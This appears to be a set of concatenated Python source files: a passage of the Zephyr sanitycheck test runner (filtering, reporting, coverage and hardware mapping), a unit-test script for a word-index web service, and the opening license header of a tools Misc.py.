if h['platform'] == plat.name:
if tc.harness_config.get('fixture') in h.get('fixtures', []):
instance.build_only = False
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = "Platform is excluded on command line."
continue
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if device_testing_filter and instance.build_only:
discards[instance] = "Not runnable on device"
continue
if tc.skip:
discards[instance] = "Skip filter"
continue
if tc.build_on_all and not platform_filter:
platform_filter = []
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = "Command line testcase tag filter"
continue
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = "Command line testcase exclude filter"
continue
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = "Testcase name filter"
continue
if arch_filter and plat.arch not in arch_filter:
discards[instance] = "Command line testcase arch filter"
continue
if not force_platform:
if tc.arch_whitelist and plat.arch not in tc.arch_whitelist:
discards[instance] = "Not in test case arch whitelist"
continue
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = "In test case arch exclude"
continue
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = "In test case platform exclude"
continue
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = "In test case toolchain exclude"
continue
if platform_filter and plat.name not in platform_filter:
discards[instance] = "Command line platform filter"
continue
if tc.platform_whitelist and plat.name not in tc.platform_whitelist:
discards[instance] = "Not in testcase platform whitelist"
continue
if tc.toolchain_whitelist and toolchain not in tc.toolchain_whitelist:
discards[instance] = "Not in testcase toolchain whitelist"
continue
if not plat.env_satisfied:
discards[instance] = "Environment ({}) not satisfied".format(", ".join(plat.env))
continue
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and tc.type != 'unit':
discards[instance] = "Not supported by the toolchain"
continue
if plat.ram < tc.min_ram:
discards[instance] = "Not enough RAM"
continue
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = "No hardware support"
continue
if plat.flash < tc.min_flash:
discards[instance] = "Not enough FLASH"
continue
if set(plat.ignore_tags) & tc.tags:
discards[instance] = "Excluded tags per platform"
continue
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if sanitycheck was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all:
if tc.platform_whitelist:
a = set(self.default_platforms)
b = set(tc.platform_whitelist)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list[:1])
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
for instance in list(filter(lambda inst: not inst.platform.default, instance_list)):
discards[instance] = "Not a default test platform"
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, test_only=False):
for instance in self.instances.values():
if test_only:
if instance.run:
pipeline.put({"op": "run", "test": instance, "status": "built"})
else:
if instance.status not in ['passed', 'skipped']:
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
return "DONE FEEDING"
def execute(self):
def calc_one_elf_size(instance):
if instance.status not in ["failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
logger.info("Adding tasks to the queue...")
# We can use a with statement to ensure threads are cleaned up promptly
with BoundedExecutor(bound=self.jobs, max_workers=self.jobs) as executor:
# start a future for a thread which sends work in through the queue
future_to_test = {
executor.submit(self.add_tasks_to_queue, self.test_only): 'FEEDER DONE'}
while future_to_test:
# check for status of the futures which are currently working
done, pending = concurrent.futures.wait(future_to_test, timeout=1,
return_when=concurrent.futures.FIRST_COMPLETED)
# if there is incoming work, start a new future
while not pipeline.empty():
# fetch a message from the queue
message = pipeline.get()
test = message['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose
)
future_to_test[executor.submit(pb.process, message)] = test.name
# process any completed futures
for future in done:
test = future_to_test[future]
try:
data = future.result()
except Exception as exc:
logger.error('%r generated an exception: %s' % (test, exc))
sys.exit('%r generated an exception: %s' % (test, exc))
else:
if data:
logger.debug(data)
# remove the now completed future
del future_to_test[future]
for future in pending:
test = future_to_test[future]
try:
future.result(timeout=180)
except concurrent.futures.TimeoutError:
logger.warning("{} stuck?".format(test))
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
def discard_report(self, filename):
try:
if self.discards is None:
raise SanityRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True, append=append)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False):
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in self.instances.items():
if platform and instance.platform.name != platform:
continue
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP':
skips += 1
else:
fails += 1
else:
if instance.status in ["failed", "timeout"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
else:
passes += 1
run = "Sanitycheck"
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
eleTestsuite = tree.findall('testsuite')[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skip'] = "%d" % skips
else:
eleTestsuites = ET.Element('testsuites')
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (errors + passes + fails + skips),
failures="%d" % fails,
errors="%d" % (errors), skip="%s" % (skips))
for _, instance in self.instances.items():
if platform and instance.platform.name != platform:
continue
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.name
# remove testcases that are being re-run from existing reports
if append:
for tc in eleTestsuite.findall('testcase'):
if tc.get('classname') == "%s:%s" % (instance.platform.name, tname):
eleTestsuite.remove(tc)
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname="%s:%s" % (instance.platform.name, tname),
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK']:
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message="failed")
p = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(p, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'SKIP':
el = ET.SubElement(
eleTestcase,
'skipped',
type="skipped",
message=instance.reason)
else:
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname="%s:%s" % (instance.platform.name, instance.testcase.name),
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["failed", "timeout"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
p = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(p, "build.log")
hl = os.path.join(p, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
return t
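# Illustrative sketch of how the factory is meant to be used by a caller
# (tool name and output path are assumptions, not part of this class):
#
#   coverage_tool = CoverageTool.factory("lcov")
#   coverage_tool.gcov_tool = "gcov"
#   coverage_tool.base_dir = ZEPHYR_BASE
#   coverage_tool.add_ignore_file("generated")
#   coverage_tool.generate("/tmp/sanity-out")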
@staticmethod
def retrieve_gcov_data(input_file):
logger.debug("Working on %s" % input_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
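# Hedged example of the handler.log fragment this parser expects (format
# inferred from the code above, the exact device output may differ):
#
#   GCOV_COVERAGE_DUMP_START
#   *path/to/file.gcda<0011a2b3...
#   GCOV_COVERAGE_DUMP_END
#
# Each "*" line maps a gcda file name to a hex dump of its contents; the
# returned dict marks the capture complete only when the END marker is seen
# (or when no dump was started at all).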
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage, gcovr fails,
# hence skip it; this problem only exists in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile], stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes +
["--json", "-o", coveragefile, outdir],
stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.connected_hardware = []
def load_device_from_cmdline(self, serial, platform):
device = {
"serial": serial,
"platform": platform,
"counter": 0,
"available": True,
"connected": True
}
self.connected_hardware.append(device)
def load_hardware_map(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
self.connected_hardware = scl.yaml_load_verify(map_file, hwm_schema)
for i in self.connected_hardware:
i['counter'] = 0
def scan_hw(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
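# Hedged example of a persistent_map entry built above (device names are
# illustrative):
#   {"/dev/ttyACM0": "/dev/serial/by-id/usb-SEGGER_J-Link_000123456789-if00"}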
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = {}
s_dev['platform'] = "unknown"
s_dev['id'] = d.serial_number
s_dev['serial'] = persistent_map.get(d.device, d.device)
s_dev['product'] = d.product
s_dev['runner'] = 'unknown'
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev['runner'] = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev['runner'] = runner
s_dev['available'] = True
s_dev['connected'] = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def write_map(self, hwm_file):
# use existing map
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=yaml.FullLoader)
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for d in self.detected:
for h in hwm:
if d['id'] == h['id'] and d['product'] == h['product']:
h['connected'] = True
h['serial'] = d['serial']
d['match'] = True
new = list(filter(lambda n: not n.get('match', False), self.detected))
hwm = hwm + new
logger.info("Registered devices:")
self.dump(hwm)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, default_flow_style=False)
else:
# create new file
with open(hwm_file, 'w') as yaml_file:
yaml.dump(self.detected, yaml_file, default_flow_style=False)
logger.info("Detected devices:")
self.dump(self.detected)
@staticmethod
def dump(hwmap=[], filtered=[], header=[], connected_only=False):
print("")
table = []
if not header:
header = ["Platform", "ID", "Serial device"]
for p in sorted(hwmap, key=lambda i: i['platform']):
platform = p.get('platform')
connected = p.get('connected', False)
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.get('id', None), p.get('serial')])
print(tabulate(table, headers=header, tablefmt="github"))
def size_report(sc):
logger.info(sc.filename)
logger.info("SECTION NAME VMA LMA SIZE HEX SZ TYPE")
for i in range(len(sc.sections)):
v = sc.sections[i]
logger.info("%-17s 0x%08x 0x%08x %8d 0x%05x %-7s" %
(v["name"], v["virt_addr"], v["load_addr"], v["size"], v["size"],
v["type"]))
logger.info("Totals: %d bytes (ROM), %d bytes (RAM)" %
(sc.rom_size, sc.ram_size))
logger.info("")
def export_tests(filename, tests):
with open(filename, "wt") as csvfile:
fieldnames = ['section', 'subsection', 'title', 'reference']
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
for test in tests:
data = test.split(".")
if len(data) > 1:
subsec = " ".join(data[1].split("_")).title()
rowdict = {
"section": data[0].capitalize(),
"subsection": subsec,
"title": test,
"reference": test
}
cw.writerow(rowdict)
else:
logger.info("{} can't be exported".format(test))
|
unit_tests.py
|
from __future__ import print_function
from database_api import DatabaseAPI
from index_service import IndexService, Indexer, Parser
import multiprocessing as mp
from twisted.web import server, resource
from twisted.internet import reactor
import requests
import json
import config
class DatabaseAPI_test:
'''
Test class for database_api.py. The functions _make_connection() and _close_connection()
are implicitly tested when the other functions are tested.
'''
def set_up(self):
self.index = DatabaseAPI(config.db_host, config.db_port,
config.db_name, config.db_user, config.db_pass)
self.passed_tests = 0
self.failed_tests = 0
# Making a table, inserting a few items, querying the database for said item.
# Explicitly tests make_tables(), upsert() and query() together, in database_api.py.
# Implicitly tests _make_connection() and _close_connection() in database_api.py.
def test_routine1(self):
print("Test 1: ",end='')
self.index.make_tables('wordfreq', {"articleid" : "VARCHAR", "word" : "VARCHAR", "frequency" : "INTEGER"}, "(articleid, word)")
self.index.upsert(table_name='wordfreq', article_id='test1', values=[('test_word1', 1), ('test_word2', 2)])
query_data = self.index.query("SELECT articleid, word, frequency FROM wordfreq WHERE word = 'test_word2';")
if query_data[0][0] == 'test1' and query_data[0][1] == 'test_word2' and query_data[0][2] == 2:
self.passed_tests += 1
print('pass')
else:
self.failed_tests += 1
print('failed')
# More or less the same as test_routine1(), but now also tests remove().
# Explicitly tests make_tables(), upsert(), query() and remove() in database_api.py.
# Implicitly tests _make_connection() and _close_connection() in database_api.py.
def test_routine2(self):
print("Test 2: ", end='')
self.index.make_tables('wordfreq', {"articleid" : "VARCHAR", "word" : "VARCHAR", "frequency" : "INTEGER"}, "(articleid, word)")
self.index.upsert(table_name='wordfreq', article_id='test2', values=[('test_word', 1)])
self.index.remove('wordfreq', 'articleid', 'test2')
query_data = self.index.query("SELECT articleid, word, frequency FROM wordfreq WHERE articleid = 'test2';")
if query_data == []:
self.passed_tests += 1
print('pass')
else:
self.failed_tests += 1
print('failed')
# Tests if upsert() updates values correctly.
def test_routine3(self):
print("Test 3: ", end='')
self.index.make_tables('wordfreq', {"articleid" : "VARCHAR", "word" : "VARCHAR", "frequency" : "INTEGER"}, "(articleid, word)")
self.index.upsert(table_name='wordfreq', article_id='test3', values=[('test_word', 1)])
self.index.upsert(table_name='wordfreq', article_id='test3', values=[('test_word', 5)])
query_data = self.index.query("SELECT articleid, word, frequency FROM wordfreq WHERE articleid = 'test3';")
if query_data[0][2] == 5:
self.passed_tests += 1
print('pass')
else:
self.failed_tests += 1
print('failed')
def run_tests(self):
print('Testing DatabaseAPI:')
self.set_up()
self.test_routine1()
self.test_routine2()
self.test_routine3()
def print_results(self):
print("DatabaseAPI test results:")
print("Passed", self.passed_tests, "out of", self.passed_tests + self.failed_tests, "tests.")
class Parser_test:
'''
Test class for the Parser class in index_service.py.
'''
def set_up(self):
self.passed_tests = 0
self.failed_tests = 0
self.html = '''
<!DOCTYPE html>
<html lang="en" style="font-family: Verdana">
<head>
<meta charset="UTF-8">
<title>
title
</title>
</head>
<body>
<p>
text
</p>
<div>
ignore
</div>
</body>
</html>
'''
self.parser = Parser(['div'])
# Tests whether the Parser ignores the right tags.
def test1(self):
print('Test 1: ', end='')
self.set_up()
self.parser.feed(self.html)
content = set(self.parser.get_content())
self.parser.close()
if 'ignore' in content:
self.failed_tests += 1
print('failed')
elif 'title' in content and 'text' in content:
self.passed_tests += 1
print('pass')
else:
self.failed_tests += 1
print('failed')
def run_tests(self):
print("Testing Parser:")
self.test1()
def print_results(self):
print("Parser test results:")
print("Passed", self.passed_tests, "out of", self.passed_tests + self.failed_tests, "tests.")
class Indexer_test:
'''
Test class for the Indexer class in index_service.py.
'''
def set_up(self):
self.passed_tests = 0
self.failed_tests = 0
self.indexer = Indexer(config.stopword_file_path, ['h1'])
# Tests whether the Indexer builds the correct index for a sample page.
def test1(self):
print('Test 1: ', end='')
url = 'http://folk.ntnu.no/alekh/it2805/index.html'
index = dict(self.indexer.make_index(url))
correct_result = {'it2805' : 1, 'prosjekt' : 1, 'to' : 11, 'link' : 11, 'homework' : 11}
for k, v in correct_result.items():
if index[k] != v:
self.failed_tests += 1
print('failed')
return
self.passed_tests += 1
print('pass')
def run_tests(self):
print("Testing Indexer:")
self.set_up()
self.test1()
def print_results(self):
print("Indexer test results:")
print("Passed", self.passed_tests, "out of", self.passed_tests + self.failed_tests, "tests.")
class IndexService_test:
'''
Test class for the IndexService class in index_service.py.
'''
def set_up(self):
self.passed_tests = 0
self.failed_tests = 0
self.index = IndexService()
reactor.listenTCP(8002, server.Site(PublishTestServer()))
self.test_publish_server_thread = mp.Process(target=reactor.run)
self.test_publish_server_thread.start()
self.test_index_service_thread = mp.Process(target=self.index.run_as_daemon, args=(8001, True))
self.test_index_service_thread.start()
#self.test_publish_server_thread.join()
#self.test_index_service_thread.join()
def init(self):
self.index.index_database.make_tables("wordfreq", {"articleid" : "VARCHAR", "word" : "VARCHAR", "frequency" : "INTEGER"}, "(articleid, word)")
self.index.index_all_articles('http://127.0.0.1:8002', unit_test=True)
# Tests whether the IndexService indexes all articles from a given publish service. Implicitly tests index_articles() too.
def test1(self):
self.init()
query_data1 = dict(self.index.index_database.query("SELECT word, frequency FROM wordfreq WHERE articleid = 'test1';"))
correct_result1 = {'it2805' : 2, 'prosjekt' : 1, 'to' : 11, 'link' : 11, 'homework' : 11, 'web' : 1, 'course' : 1, 'asd' : None}
print("Test 1: ", end='')
for k, v in correct_result1.items():
if query_data1.get(k) != v:
self.failed_tests += 1
print('failed')
return
query_data2 = dict(self.index.index_database.query("SELECT word, frequency FROM wordfreq WHERE articleid = 'test2';"))
correct_result2 = {'it2805' : None, 'site' : 1, 'tabels' : 1, 'links' : 1, 'homework' : 1, 'assignment' : 1, 'course' : None}
for k, v in correct_result2.items():
if query_data2.get(k) != v:
self.failed_tests += 1
print('failed')
return
self.passed_tests += 1
print('pass')
# Testing render_post() with task getSuggestions.
def test2(self):
self.init()
r = requests.post('http://127.0.0.1:8001', data = json.dumps({'task' : 'getSuggestions', 'word' : 'lin'}))
correct_result = set(['link', 'links'])
print("Test 2: ", end='')
for s in r.json()['suggestions']:
if s not in correct_result:
self.failed_tests += 1
print('failed')
return
self.passed_tests += 1
print('pass')
# Testing render_post() with task getArticles.
def test3(self):
self.init()
r = requests.post('http://127.0.0.1:8001', data = json.dumps({'task' : 'getArticles', 'word' : 'coding'}))
print("Test 3: ", end='')
if r.json()['articleID'] == ['test2']:
self.passed_tests += 1
print('pass')
else:
self.failed_tests += 1
# Testing render_post() with task getFrequencyList.
def test4(self):
self.init()
r = requests.post('http://127.0.0.1:8001', data = json.dumps({'task' : 'getFrequencyList'}))
results = r.json()
correct_result = {'homework' : 12, 'course' : 1, 'link' : 11, 'links' : 1, 'it2805' : 2, 'to' : 11, 'html' : 1}
print('Test 4: ', end='')
for k, v in correct_result.items():
if results.get(k) != v:
self.failed_tests += 1
print('failed')
return
self.passed_tests += 1
print('pass')
'''
# Testing render_post() with task publishedArticle.
def test5(self):
self.index.index_database.make_tables("wordfreq", {"articleid" : "VARCHAR", "word" : "VARCHAR", "frequency" : "INTEGER"}, "(articleid, word)")
r = requests.post('http://127.0.0.1:8001', data = json.dumps({'task' : 'publishedArticle', 'articleID' : 'http://folk.ntnu.no/alekh/it2805/index.html'}))
# Testing render_post() with task removedArticle.
def test6(self):
self.init()
'''
def run_tests(self):
print("Testing IndexService:")
self.set_up()
self.test1()
self.test2()
self.test3()
self.test4()
# No need for further testing since the other functions are implicitly tested.
#self.test5()
#self.test6()
self.test_publish_server_thread.terminate()
self.test_index_service_thread.terminate()
def print_results(self):
print('IndexService test results:')
print("Passed", self.passed_tests, "out of", self.passed_tests + self.failed_tests, "tests.")
class PublishTestServer(resource.Resource):
'''
Publish test server for serving GET requests from IndexService_test.
'''
isLeaf = True
def render_GET(self, request):
return json.dumps({"list": [{"id" : "http://folk.ntnu.no/alekh/it2805/index.html", "title" : "test1"}, {"id" : "http://folk.ntnu.no/alekh/it2805/02/index.html", "title" : "test2"}]})
if __name__ == "__main__":
database_test = DatabaseAPI_test()
database_test.run_tests()
print()
parser_test = Parser_test()
parser_test.run_tests()
print()
indexer_test = Indexer_test()
indexer_test.run_tests()
print()
index_service_test = IndexService_test()
index_service_test.run_tests()
from time import sleep
sleep(2)
print()
print("Results from tests:")
database_test.print_results()
parser_test.print_results()
indexer_test.print_results()
index_service_test.print_results()
'''
Results from tests:
DatabaseAPI test results:
Passed 3 out of 3 tests.
Parser test results:
Passed 1 out of 1 tests.
Indexer test results:
Passed 1 out of 1 tests.
IndexService test results:
Passed 4 out of 4 tests.
'''
|
Misc.py
|
## @file
# Common routines used by all tools
#
# Copyright (c) 2007 - 2019, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
